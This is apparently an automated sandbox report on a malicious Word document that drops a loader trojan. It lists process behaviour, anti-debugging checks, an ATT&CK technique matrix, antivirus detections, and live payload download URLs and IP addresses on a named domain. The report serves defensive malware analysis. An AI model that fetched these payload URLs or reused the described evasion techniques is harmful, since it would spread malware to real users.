Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_028F58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

7_2_028F58B4

Source: brightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\brightness.exe

API call chain: ExitProcess graph end node

graph_7-29075

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_0290F024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

7_2_0290F024

Source: C:\Windows\SysWOW64\brightness.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_02908798 LoadLibraryW,GetProcAddress,FreeLibrary,

7_2_02908798

Source: C:\Windows\SysWOW64\brightness.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	7_2_028F5A78
Source: C:\Windows\SysWOW64\brightness.exe	Code function: GetLocaleInfoA,	7_2_028FA790
Source: C:\Windows\SysWOW64\brightness.exe	Code function: GetLocaleInfoA,	7_2_028FA744
Source: C:\Windows\SysWOW64\brightness.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	7_2_028F5B84

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_028F918C GetLocalTime,

7_2_028F918C

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_028FB70C GetVersionExA,

7_2_028FB70C

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	22 Scripting	1 Valid Accounts	1 Native API	1 Valid Accounts	1 Valid Accounts	121 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	33 Exploitation for Client Execution	22 Scripting	1 Access Token Manipulation	1 Valid Accounts	LSASS Memory	211 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 Process Injection	1 Access Token Manipulation	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	222 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Process Injection	LSA Secrets	1 System Network Connections Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	25 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
zYj1wg0cM2.doc	70%	Virustotal		Browse
zYj1wg0cM2.doc	58%	ReversingLabs	Win32.Exploit.DBatLoader
zYj1wg0cM2.doc	100%	Avira	W97M/Agent.5915124
zYj1wg0cM2.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Windows\SysWOW64\brightness.exe	75%	ReversingLabs	Win32.Trojan.ModiLoader

Source	Detection	Scanner	Label
http://amazonenviro.com/d	0%	Avira URL Cloud	safe
http://amazonenviro.com/245_Aiymwhpjxsg	100%	Avira URL Cloud	malware
http://amazonenviro.com/245_Aiymwhpjxsgk	0%	Avira URL Cloud	safe
http://amazonenviro.com/245_Aiymwhpjxsgs)I0	0%	Avira URL Cloud	safe
http://amazonenviro.com/245_AiymwhpjxsgU)	0%	Avira URL Cloud	safe
http://amazonenviro.com/245_AiymwhpjxsgX	0%	Avira URL Cloud	safe
http://amazonenviro.com/	0%	Avira URL Cloud	safe
http://amazonenviro.com:80/245_Aiymwhpjxsg	100%	Avira URL Cloud	malware
http://amazonenviro.com/245_AiymwhpjxsgXXg	0%	Avira URL Cloud	safe
http://amazonenviro.com/245_AiymwhpjxsgHVg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
amazonenviro.com	166.62.27.188	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://amazonenviro.com/245_Aiymwhpjxsg	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://amazonenviro.com/d	brightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://amazonenviro.com/245_AiymwhpjxsgHVg	brightness.exe, 00000007.00000003.2748251081.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2233780799.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2341429220.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2277233447.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2683777640.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2598679709.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2930996778.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2812904011.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2726703962.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2449112148.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3210566078.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3027231666.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2984339875.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3338945279.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://amazonenviro.com/	brightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2984089954.00000000006F4000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://amazonenviro.com/245_Aiymwhpjxsgk	brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://amazonenviro.com:80/245_Aiymwhpjxsg	brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://amazonenviro.com/245_AiymwhpjxsgX	brightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://amazonenviro.com/245_AiymwhpjxsgU)	brightness.exe, 00000007.00000003.2748251081.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2683777640.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2598679709.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2726703962.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://amazonenviro.com/245_AiymwhpjxsgXXg	brightness.exe, 00000007.00000003.3210566078.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3338945279.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://amazonenviro.com/245_Aiymwhpjxsgs)I0	brightness.exe, 00000007.00000003.2748251081.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2683777640.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2598679709.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2812904011.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2726703962.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3210566078.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
166.62.27.188	amazonenviro.com	United States		26496	AS-26496-GO-DADDY-COM-LLCUS	false
147.124.216.113	unknown	United States		1432	AC-AS-1US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587350
Start date and time:	2025-01-10 08:57:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	zYj1wg0cM2.doc (renamed file extension from none to doc, renamed because original name is a hash value)
Original Sample Name:	96882b077a607f34cd963461341d728982e2075ffd4891f1b91e915da904cfe0
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@4/3@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 23 Number of non-executed functions: 37
Cookbook Comments:	Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 13.89.179.8, 2.21.65.130, 2.21.65.149, 2.23.242.162, 52.111.236.33, 52.111.236.35, 52.111.236.32, 52.111.236.34, 52.109.28.47, 40.126.32.72, 4.175.87.197, 13.107.246.45
